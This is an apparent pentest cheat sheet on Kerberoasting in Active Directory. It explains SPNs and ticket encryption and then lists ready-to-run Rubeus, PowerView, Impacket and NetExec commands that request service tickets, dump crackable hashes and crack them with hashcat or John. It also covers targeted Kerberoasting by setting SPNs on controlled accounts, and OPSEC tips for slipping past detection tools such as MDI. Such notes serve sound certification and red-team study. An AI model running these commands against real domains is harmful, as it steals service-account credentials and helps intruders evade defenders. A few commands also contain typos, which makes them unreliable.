CRTPCAPEkerberosactive-directorySPN

Kerberoasting

Overview

Typically, Kerberoasting happens after compromising a valid domain user. However, according to new research, it is possible to perform this attack with an account susceptible to ASREPRoast. For an example of this attack vector check Rebound.

OPSEC: Kerberoasting is a very silent attack. Only one logged entry is created when requesting the TGS (4769). There are typically thousands of those events on a DC per day.

Kerberoasting is an attack on the TGS and Service Principal Names (SPNs). SPNs are unique IDs that Kerberos uses to map a service instance, for example MySQL, to a service sign-in account, such as svc_mysql, in whose, often privileged, context the service is running. Any domain user, or SYSTEM access on a domain-joined host, can request a TGS from the DC for any SPN account. The TGS is encrypted with the service's account NTLM hash, so it can potentially be cracked.

                         TGS-REP
  (encrypted with the already known User-KDC session key)
+--------------------------------------------------------+
|	+----------------------------------------------------+ |
|	|  1. User-Service session key                       | |
|	|     (Same session key as in the TGS)               | |
|	+----------------------------------------------------+ |
|                                                        |
|	+----------------------------------------------------+ |
|	|  2. Service Ticket (TGS)                           | |
|	|     +-------------------------------------------+  | |
|	|     | User information                          |  | |
|	|     | +                                         |  | | -------> Kerberoast 
|	|     | User / Service session key                |  | |            
|	|     +-------------------------------------------+  | |
|	|     Encrypted with the service account's secret    | |
+	+----------------------------------------------------+ |

Service vs User Accounts

When a new service is deployed in an environment using Kerberos, it is registered with an SPN, which acts as an alias that uniquely identifies the service. In modern and well-configured environments, services are typically associated with machine or managed service accounts. These accounts, like the krbtgt account, are designed to use strong, automatically generated passwords that can auto-rotate periodically. For example, machine accounts (such as HOSTNAME$) use long, randomly generated passwords which significantly reduces the likelihood of successful offline cracking.

However, not all vendors or legacy applications support managed service accounts. As a result, SPNs may instead be associated with standard user accounts, which introduces a higher risk because password strength and rotation depend on manual management. In some cases, automatic password rotation may also cause operational issues if the service or application is not designed to handle credential updates properly.

If an SPN is tied to a user account and the corresponding TGS cannot be cracked, this is still as a low or informational finding. It highlights the presence of potentially weak password practices and indicates that successful credential recovery may still be possible under different conditions.

AES vs RC4 Encryption

From an attack perspective, encryption type is an important factor. Legacy RC4-encrypted TGS ($krb5tgs$23$) are generally easier to crack than those encrypted with stronger AES algorithms ($krbtgs$18). Even in environments that primarily use AES, tools such as Rubeus can sometimes request RC4-encrypted tickets using options like /tgtdeleg, provided RC4 remains enabled for compatibility with older systems.

Tools

Windows

Target user accounts with SPNs and Service Accounts with RC4.

OPSEC: To evade detection mechanisms that flag Kerberos encryption downgrades, like MDI, focus on service accounts that are configured to support only RC4-HMAC. Requesting a TGS for them using RC4 appears legitimate and does not trigger downgrade alerts. In addition, try to Kerberoast a single user at a time as this is not seen as an anomaly. E.g. .\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

#----------------------------------------#
# Enumeration of Kerberoastable accounts #
#----------------------------------------#

# LDAP query for listing users with a non-empty SPN
&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)

# AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} - Properties ServicePrincipalName

# PowerView
Get-DomainUser * -SPN | select samaccountname,serviceprincipalname

# Rubeus
.\Rubeus.exe kerberoast /stats

#---------------#
# Kerberoasting #
#---------------#

# Kerberoast all SPNs with PowerView
Invoke-Kerberoast

# Kerberoast all SPNs with PowerView
Get-DomainUser * -SPN -verbose |  Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_spns.csv -NoTypeInformation

# Kerberoast the target account with PowerView
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

# Kerberoast the target account and extract the hash with PowerView
Get-DomainUser -Identity svc_mssql | Get-DomainSPNTicket -Format Hashcat | ForEach-Object { $_.Hash -replace '\s+', '' }

# Kerberoast all SPNs with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast /format:hashcat /nowrap

# Kerberoast a single user with Rubeus
.\Rubeus.exe kerberoast /user:svcadmin /simple

# Kerberoast the target account using explicit credentials
.\Rubeus.exe kerberoast /creduser:domain\user1 /credpassword:pass /user:targetUser /outfile:hash.txt /format:hashcat /nowrap

# Kerberoast an AS-REPRoastable account with known SPN
.\Rubeus.exe kerberoast /nopreauth:asreproastable.user /domain:batman.local /spn:MSSQLSvc/SQL01:1433 /nowrap /dc:10.10.10.1

# Kerberoast an AS-REPRoastable account against a list of SPNs
.\Rubeus.exe kerberoast /nopreauth:asreproastable.user /domain:batman.local /spns:listofspns.txt /nowrap

#---------------#
# Hash cracking #
#---------------#

# Hashcat
hashcat -m 13100 hashes.kerberoast rockyou.txt -r best64.rule --force

# John
.\john.exe --wordlist=<wordlist> hashes.kerberoast

#----------#
# Clean Up #
#----------#

# Clear the SPNs of the target account with PowerView
Set-DomainObject -Identity sqldev -Clear serviceprincipalname

Linux

Impacket GetUserSPNs & Kerberoasting Explained
For an example of Kerberoasting using NetExec, see Active.
For an example of Kerberoasting using Rubeus see Sizzle.

If time sync errors occur (KRB_AP_ERR_SKEW(Clock skew too great)) → sudo ntpdate <dc-ip>.

#----------------------------------------#
# Enumeration of Kerberoastable accounts #
#----------------------------------------#

# Impacket
impacket-GetUserSPNs -request -dc-ip 192.168.50.70 batman.local/x7331 -outputfile users.txt

#---------------#
# Kerberoasting #
#---------------#

# NetExec
nxc ldap 192.168.0.104 -u user -p pass --kerberoasting output.txt

# Kerberoast an AS-REPRoastable account
impacket-GetUserSPNs -no-preauth asreproastable.user -usersfile domain_users -dc-host 10.10.11.231 batman.local/ -outputfile kerberoastable_users.txt

#---------------#
# Hash cracking #
#---------------#

# Hashcat
hashcat -m 13100 hashes.kerberoast rockyou.txt -r best64.rule --force

# John
.\john.exe --wordlist=<wordlist> hashes.kerberoast

Targeted Kerberoast

If we have GenericAll, GenericWrite, WriteProperty, WriteSPN, or ValidatedSPN over a user object, we can set an SPN on it, request a TGS for this SPN, and then extract and potentially crack the user's hash.

OPSEC: Clean up by removing the SPN afterwards.

Windows

# Set a SPN for the target user (must be unique for the forest) (PowerView)
Set-DomainObject -Identity bob -Set @{serviceprincipalname='random/stuff'}

# Set a SPN for the target user (must be unique for the forest) with AD module
Set-ADUser -Identity bob -ServicePrincipalNames @{Add='random/stuff'}

# Confirm that the SPN was set (PowerView)
Get-DomainUser bob | Select serviceprincipalname

# Obtain a TGS and extract the hash (PowerView)
Get-DomainUser -Identity bob | Get-DomainSPNTicket | Select-Object -ExpandProperty Hash

# Clean up (PowerView)
Set-DomainObject -Identity bob -Clear serviceprincipalnam

Linux

This attack can be carried out using the targetedKerberoast.py tool. The script automates the process by attempting to assign a temporary SPN to user accounts that do not already have one. Once the SPN is set, the tool requests a TGS and extracts the corresponding Kerberos hash, which can later be cracked offline. After completing the process, the tool removes the SPN to restore the original state of the account and reduce the likelihood of detection.

targetedKerberoast.py -v -d marvel.local -u x7331 -p 'Passw0rd123!' --request-user bob --dc-ip 10.10.10.81

PreviousIntra-Forest NextLocal SAM Dump

Last updated 24 days ago

hashtagOverview

hashtagService vs User Accounts

hashtagAES vs RC4 Encryption

hashtagTools

hashtagWindows

hashtagLinux

hashtagTargeted Kerberoast

hashtagWindows

hashtagLinux

Overview

Service vs User Accounts

AES vs RC4 Encryption

Tools

Windows

Linux

Targeted Kerberoast

Windows

Linux